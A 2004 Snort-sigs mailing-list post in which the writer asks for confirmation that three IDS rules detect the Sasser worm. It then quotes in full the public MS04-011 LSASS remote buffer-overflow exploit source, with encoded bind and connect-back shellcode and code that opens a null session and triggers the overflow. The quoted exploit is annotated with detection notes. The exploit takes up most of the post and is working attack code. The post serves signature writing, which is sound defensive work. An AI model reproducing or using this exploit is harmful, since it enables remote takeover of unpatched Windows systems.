[Snort-sigs] Sasser rules report [20040503-1456]

benoit.donneaux at ...2445... benoit.donneaux at ...2445...
Mon May 3 06:00:12 EDT 2004


I'm looking for confirmation that these rules match Sasser:

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 ( sid: 1000041; rev: 1; msg: "LSASS MS04-011 exploit"; flow: established,to_server; content:"|eb10 5a4a 33c9 66b9 7d01 8034 0a99 e2fa eb05 e8eb ffff|"; reference:url,www.secuser.com/alertes/2004/sasser.htm; classtype: shellcode-detect;)
alert tcp $HOME_NET any -> $EXTERNAL_NET 9996 ( sid: 1000042; rev: 3; msg:"Sasser ftp script to transfer up.exe"; content:"|5F75702E657865|"; depth:250; flags:A+; reference:url,www.secuser.com/alertes/2004/sasser.htm; classtype: misc-activity;)
alert tcp $EXTERNAL_NET any -> $HOME_NET 5554 ( sid: 1000043; rev: 1; msg:"Sasser binary transfer get up.exe"; content:"|5F75702E657865|"; depth:250; flags:A+; reference:url,www.secuser.com/alertes/2004/sasser.htm; classtype: misc-activity;)

I know the first one is too broad, but I'll try to match the exact LSASS exploit based on the sample:
// Comments from K-OTik.COM : to make this exploit work remotely you have to use the
// sbaaNetapi.dll which modifies the DsRoleUpgradeDownlevelServer API; this will allow
// the remote host to be specified as explained in the eEye advisory...
//
// http://www.k-otik.com/exploits/04252004.ms04011lsass.rar

#include <windows.h>
#pragma comment(lib,\"mpr.lib\")
#pragma comment(lib, \"ws2_32\")
// Connect-back variant of the payload; main() selects it only when a
// ConnectBackIP argument is given and patches the port at offset 118 and
// the IP at offset 111, both XORed with 0x99 first. The head of the array
// (80 34 0B 99 / E2 FA) looks like an XOR-0x99 decoder loop -- inferred
// from the byte pattern, not verified by disassembly.
// Detection note: the first bytes here (EB 10 5B 4B 33 C9 66 B9 25 01 80 34
// 0B ...) differ from scode2 at bytes 2-3, 8 and 12, so the sid 1000041
// content pattern posted above (eb10 5a4a ... 7d01 8034 0a99 ...) does NOT
// match this variant.
unsigned char scode[] =
\"\\xEB\\x10\\x5B\\x4B\\x33\\xC9\\x66\\xB9\\x25\\x01\\x80\\x34\\x0B\\x99\\xE2\\xFA\"
\"\\xEB\\x05\\xE8\\xEB\\xFF\\xFF\\xFF\"
\"\\x70\\x62\\x99\\x99\\x99\\xC6\\xFD\\x38\\xA9\\x99\\x99\\x99\\x12\\xD9\\x95\\x12\"
\"\\xE9\\x85\\x34\\x12\\xF1\\x91\\x12\\x6E\\xF3\\x9D\\xC0\\x71\\x02\\x99\\x99\\x99\"
\"\\x7B\\x60\\xF1\\xAA\\xAB\\x99\\x99\\xF1\\xEE\\xEA\\xAB\\xC6\\xCD\\x66\\x8F\\x12\"
\"\\x71\\xF3\\x9D\\xC0\\x71\\x1B\\x99\\x99\\x99\\x7B\\x60\\x18\\x75\\x09\\x98\\x99\"
\"\\x99\\xCD\\xF1\\x98\\x98\\x99\\x99\\x66\\xCF\\x89\\xC9\\xC9\\xC9\\xC9\\xD9\\xC9\"
\"\\xD9\\xC9\\x66\\xCF\\x8D\\x12\\x41\\xF1\\xE6\\x99\\x99\\x98\\xF1\\x9B\\x99\\x9D\"
\"\\x4B\\x12\\x55\\xF3\\x89\\xC8\\xCA\\x66\\xCF\\x81\\x1C\\x59\\xEC\\xD3\\xF1\\xFA\"
\"\\xF4\\xFD\\x99\\x10\\xFF\\xA9\\x1A\\x75\\xCD\\x14\\xA5\\xBD\\xF3\\x8C\\xC0\\x32\"
\"\\x7B\\x64\\x5F\\xDD\\xBD\\x89\\xDD\\x67\\xDD\\xBD\\xA4\\x10\\xC5\\xBD\\xD1\\x10\"
\"\\xC5\\xBD\\xD5\\x10\\xC5\\xBD\\xC9\\x14\\xDD\\xBD\\x89\\xCD\\xC9\\xC8\\xC8\\xC8\"
\"\\xF3\\x98\\xC8\\xC8\\x66\\xEF\\xA9\\xC8\\x66\\xCF\\x9D\\x12\\x55\\xF3\\x66\\x66\"
\"\\xA8\\x66\\xCF\\x91\\xCA\\x66\\xCF\\x85\\x66\\xCF\\x95\\xC8\\xCF\\x12\\xDC\\xA5\"
\"\\x12\\xCD\\xB1\\xE1\\x9A\\x4C\\xCB\\x12\\xEB\\xB9\\x9A\\x6C\\xAA\\x50\\xD0\\xD8\"
\"\\x34\\x9A\\x5C\\xAA\\x42\\x96\\x27\\x89\\xA3\\x4F\\xED\\x91\\x58\\x52\\x94\\x9A\"
\"\\x43\\xD9\\x72\\x68\\xA2\\x86\\xEC\\x7E\\xC3\\x12\\xC3\\xBD\\x9A\\x44\\xFF\\x12\"
\"\\x95\\xD2\\x12\\xC3\\x85\\x9A\\x44\\x12\\x9D\\x12\\x9A\\x5C\\x32\\xC7\\xC0\\x5A\"
\"\\x71\\x99\\x66\\x66\\x66\\x17\\xD7\\x97\\x75\\xEB\\x67\\x2A\\x8F\\x34\\x40\\x9C\"
\"\\x57\\x76\\x57\\x79\\xF9\\x52\\x74\\x65\\xA2\\x40\\x90\\x6C\\x34\\x75\\x60\\x33\"
\"\\xF9\\x7E\\xE0\\x5F\\xE0\";

// Default payload; main() uses it whenever no ConnectBackIP argument is
// given and, if a port is supplied, patches it (XORed with 0x99) at
// offset 176.
// Detection note: the 22-byte content of sid 1000041 posted above
// (eb10 5a4a 33c9 66b9 7d01 8034 0a99 e2fa eb05 e8eb ffff) is exactly the
// first 22 bytes of this array, i.e. it keys on the short stub ahead of the
// encoded body, not on the body itself.
unsigned char scode2[] =
\"\\xEB\\x10\\x5A\\x4A\\x33\\xC9\\x66\\xB9\\x7D\\x01\\x80\\x34\\x0A\\x99\\xE2\\xFA\"
\"\\xEB\\x05\\xE8\\xEB\\xFF\\xFF\\xFF\"
\"\\x70\\x95\\x98\\x99\\x99\\xC3\\xFD\\x38\\xA9\\x99\\x99\\x99\\x12\\xD9\\x95\\x12\"
\"\\xE9\\x85\\x34\\x12\\xD9\\x91\\x12\\x41\\x12\\xEA\\xA5\\x12\\xED\\x87\\xE1\\x9A\"
\"\\x6A\\x12\\xE7\\xB9\\x9A\\x62\\x12\\xD7\\x8D\\xAA\\x74\\xCF\\xCE\\xC8\\x12\\xA6\"
\"\\x9A\\x62\\x12\\x6B\\xF3\\x97\\xC0\\x6A\\x3F\\xED\\x91\\xC0\\xC6\\x1A\\x5E\\x9D\"
\"\\xDC\\x7B\\x70\\xC0\\xC6\\xC7\\x12\\x54\\x12\\xDF\\xBD\\x9A\\x5A\\x48\\x78\\x9A\"
\"\\x58\\xAA\\x50\\xFF\\x12\\x91\\x12\\xDF\\x85\\x9A\\x5A\\x58\\x78\\x9B\\x9A\\x58\"
\"\\x12\\x99\\x9A\\x5A\\x12\\x63\\x12\\x6E\\x1A\\x5F\\x97\\x12\\x49\\xF3\\x9A\\xC0\"
\"\\x71\\x1E\\x99\\x99\\x99\\x1A\\x5F\\x94\\xCB\\xCF\\x66\\xCE\\x65\\xC3\\x12\\x41\"
\"\\xF3\\x9C\\xC0\\x71\\xED\\x99\\x99\\x99\\xC9\\xC9\\xC9\\xC9\\xF3\\x98\\xF3\\x9B\"
\"\\x66\\xCE\\x75\\x12\\x41\\x5E\\x9E\\x9B\\x99\\x9D\\x4B\\xAA\\x59\\x10\\xDE\\x9D\"
\"\\xF3\\x89\\xCE\\xCA\\x66\\xCE\\x69\\xF3\\x98\\xCA\\x66\\xCE\\x6D\\xC9\\xC9\\xCA\"
\"\\x66\\xCE\\x61\\x12\\x49\\x1A\\x75\\xDD\\x12\\x6D\\xAA\\x59\\xF3\\x89\\xC0\\x10\"
\"\\x9D\\x17\\x7B\\x62\\x10\\xCF\\xA1\\x10\\xCF\\xA5\\x10\\xCF\\xD9\\xFF\\x5E\\xDF\"
\"\\xB5\\x98\\x98\\x14\\xDE\\x89\\xC9\\xCF\\xAA\\x50\\xC8\\xC8\\xC8\\xF3\\x98\\xC8\"
\"\\xC8\\x5E\\xDE\\xA5\\xFA\\xF4\\xFD\\x99\\x14\\xDE\\xA5\\xC9\\xC8\\x66\\xCE\\x79\"
\"\\xCB\\x66\\xCE\\x65\\xCA\\x66\\xCE\\x65\\xC9\\x66\\xCE\\x7D\\xAA\\x59\\x35\\x1C\"
\"\\x59\\xEC\\x60\\xC8\\xCB\\xCF\\xCA\\x66\\x4B\\xC3\\xC0\\x32\\x7B\\x77\\xAA\\x59\"
\"\\x5A\\x71\\x76\\x67\\x66\\x66\\xDE\\xFC\\xED\\xC9\\xEB\\xF6\\xFA\\xD8\\xFD\\xFD\"
\"\\xEB\\xFC\\xEA\\xEA\\x99\\xDA\\xEB\\xFC\\xF8\\xED\\xFC\\xC9\\xEB\\xF6\\xFA\\xFC\"
\"\\xEA\\xEA\\xD8\\x99\\xDC\\xE1\\xF0\\xED\\xCD\\xF1\\xEB\\xFC\\xF8\\xFD\\x99\\xD5\"
\"\\xF6\\xF8\\xFD\\xD5\\xF0\\xFB\\xEB\\xF8\\xEB\\xE0\\xD8\\x99\\xEE\\xEA\\xAB\\xC6\"
\"\\xAA\\xAB\\x99\\xCE\\xCA\\xD8\\xCA\\xF6\\xFA\\xF2\\xFC\\xED\\xD8\\x99\\xFB\\xF0\"
\"\\xF7\\xFD\\x99\\xF5\\xF0\\xEA\\xED\\xFC\\xF7\\x99\\xF8\\xFA\\xFA\\xFC\\xE9\\xED\"
\"\\x99\\xFA\\xF5\\xF6\\xEA\\xFC\\xEA\\xF6\\xFA\\xF2\\xFC\\xED\\x99\";

// Prototype of the DsRoleUpgradeDownlevelServer entry point that main()
// resolves from sbaaNetapi.dll. All twelve parameters are declared as
// unsigned long even though main() passes buffer pointers through them.
typedef int (_stdcall *DSROLEUPGRADEDOWNLEVELSERVER)
(unsigned long, unsigned long, unsigned long, unsigned long,
unsigned long, unsigned long, unsigned long, unsigned long, 
unsigned long, unsigned long, unsigned long, unsigned long);
DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;
// Fixed-size global buffers (zero from static initialisation): buf holds
// the single-byte payload image, sendbuf its byte/0x00 expanded form (see
// the "unicode" loop in main), buf2 is a dummy argument, target2 the
// expanded target name. target2 and the hostipc path in main() are written
// from argv without any length check against these sizes.
#define LEN 3500
char buf[LEN+1];
char sendbuf[(LEN+1)*2];
char buf2[2];
char target2[200];
// Entry point of the posted exploit sample, kept here as the reference for
// the signatures above. argv[1] selects the target build (0 = 2k, 1 = xp),
// argv[2] is the target host; optional argv[3]/argv[4] are a port and a
// connect-back IP that get patched into the payload. Returns 0 on every
// path except the exit(0) calls on DLL / symbol lookup failure.
int main(int argc, char *argv[])
{
HMODULE hNetapi;
int ret=0;
int i;
char c, *target;  // c is declared but never used
LPSTR hostipc[40];  // 40 pointers, but written through as a raw char buffer below
NETRESOURCE netResource; 
unsigned short port;
unsigned long ip;
unsigned char* sc;
if (argc < 3) {
// Usage text. The "\bug" in the original string is a backslash typo
// (a backspace escape followed by "ug"), so "bug" prints mangled.
printf(\"Windows Lsasrv.dll RPC [ms04011] buffer overflow Remote Exploit\\n \\bug discoveried by eEye,\\n \\
code by sbaa (sysop sbaa 3322 org) 2004/04/24 ver 0.1\\n \\
Usage: \\n \\
%s 0 targetip (Port ConnectBackIP ) \\
----> attack 2k (tested on cn sp4,en sp4)\\n \\
%s 1 targetip (Port ConnectBackIP ) \\
----> attack xp (tested on cn sp1)\\n\",argv[0],argv[0]);
printf(\"\");  // no-op
return 0; 
}
target = argv[2];
// Unbounded sprintf of argv[2] into hostipc (160 bytes on a 32-bit build):
// no length check on the hostname.
sprintf((char *)hostipc,\"\\\\\\\\%s\\\\ipc$\",target); 
netResource.lpLocalName = NULL; 
netResource.lpProvider = NULL; 
netResource.dwType = RESOURCETYPE_ANY; 
netResource.lpRemoteName=(char *)hostipc;

// Null session to the target's IPC$ share with empty user/password. A
// failure only prints -- the early return is commented out, so execution
// continues regardless.
ret = WNetAddConnection2(&netResource, \"\", \"\", 0); // attempt a null session 
if (ret != 0) 
{ 
printf(\"Create NULL session failed\\n\");
// return 1; 
} 

// Per the K-OTik header comment, sbaaNetapi.dll is a modified netapi32
// whose DsRoleUpgradeDownlevelServer accepts a remote host; the system
// DLL is not used.
hNetapi = LoadLibrary(\"sbaaNetapi.dll\");
if (!hNetapi) {
printf(\"Can't load sbaaNetapi.dll.\\n\");
exit(0);
}
// Cast-as-lvalue assignment: not standard C, accepted by older MSVC.
(DWORD *)DsRoleUpgradeDownlevelServer = (DWORD *)GetProcAddress(hNetapi, \"DsRoleUpgradeDownlevelServer\");
if (!DsRoleUpgradeDownlevelServer) {
printf(\"Can't find function.\\n\");
exit(0);
}
// Fill the payload image with 0x90 (x86 NOP) bytes.
memset(buf, '\\x90', LEN);

// Payload selection. With a connect-back IP (argv[4]) use scode, patching
// the port at offset 118 and the IP at offset 111; otherwise scode2, with
// the optional port at offset 176. Both values are XORed with 0x99 bytes
// first, consistent with the XOR-0x99 decoder stub at the head of each
// array (inferred from the stub bytes, not verified).
if(argc>4)
{
port = htons(atoi(argv[3]))^(USHORT)0x9999;
ip = inet_addr(argv[4])^(ULONG)0x99999999;
memcpy(&scode[118], &port, 2);
memcpy(&scode[111], &ip, 4);
sc=scode;
} 
else
{
if(argc>3)
{
port = htons(atoi(argv[3]))^(USHORT)0x9999;
memcpy(&scode2[176], &port, 2);
}
sc=scode2;
}
// Two copies of the payload at fixed offsets (2036 and 2856), each preceded
// by 4-byte constants at 2020 and 2840/2844 that the author's comments tie
// to the 2k sp3 / sp4 builds.
// Detection note: these constants and offsets are fixed in the sample and
// are invariants a signature could use in addition to the decoder stub.
//attack all 2k sp3 version
memcpy(&buf[2020], \"\\x95\\x0c\\x01\\x78\", 4);
memcpy(&buf[2036], sc, strlen(sc));
//attack all 2k sp4 version 
memcpy(&buf[2840], \"\\xeb\\x06\\xeb\\x06\", 4);
memcpy(&buf[2844],\"\\x2b\\x38\\x03\\x78\",4);
memcpy(&buf[2856], sc, strlen(sc));

printf(\"shellcode size %d\\n\", strlen(sc));  // %d with a size_t argument

// Expand buf into sendbuf as 16-bit characters (each byte followed by 0x00)
// and double-NUL terminate; sendbuf is the first argument of the call below.
// Detection note: on this (2k) path the payload bytes are therefore
// interleaved with 0x00 in sendbuf, so a contiguous content match such as
// sid 1000041's lines up with the raw copy made on the xp path below rather
// than with this expanded form; what actually appears on the wire also
// depends on the RPC marshalling, which is not visible here.
for(i=0; i<LEN; i++) { //unicode
sendbuf[i*2] = buf[i];
sendbuf[i*2+1] = 0;
}
sendbuf[LEN*2]=0;
sendbuf[LEN*2+1]=0;
// xp target: overwrite the front of sendbuf with the raw, non-expanded
// payload, then three fixed-offset patches at 1948, 1964 and 1980.
if(atoi(argv[1])==1)
{
memcpy(&sendbuf, sc, strlen(sc));
memcpy(sendbuf+1964,\"\\xad\\x14\\x48\\x74\",4);
memcpy(&sendbuf[1948], \"\\xb8\\x44\\xf8\\xff\\xff\\x03\\xc4\\x81\\xec\\x00\\x20\\x00\\x00\\xff\\xe0\\x00\", 16);
memcpy(&sendbuf[1980], \"\\xeb\\xde\",2);
}
// Expand the target name the same way. Only 100 of target2's 200 bytes are
// cleared here and there is no length check: a hostname longer than 100
// characters writes past the end of target2.
memset(target2, 0, 100);
for(i=0; i<strlen(target); i++) {
target2[i*2] = target[i];
target2[i*2+1] = 0;
}
memset(buf2, 0, 2);
ret=0;
// The patched entry point receives sendbuf as its first argument and the
// expanded target name as its ninth; every other parameter is the same
// 2-byte zeroed buffer.
ret=DsRoleUpgradeDownlevelServer(&sendbuf[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0], 
&buf2[0], &buf2[0], target2, &buf2[0], &buf2[0], &buf2[0]);
printf(\"Ret value = %d\\n\",ret);  // return code is printed, not interpreted
// Tear down the IPC$ connection (forced) and unload the DLL.
WNetCancelConnection2(netResource.lpRemoteName, 0, TRUE); 
FreeLibrary(hNetapi); 
return 0;
}

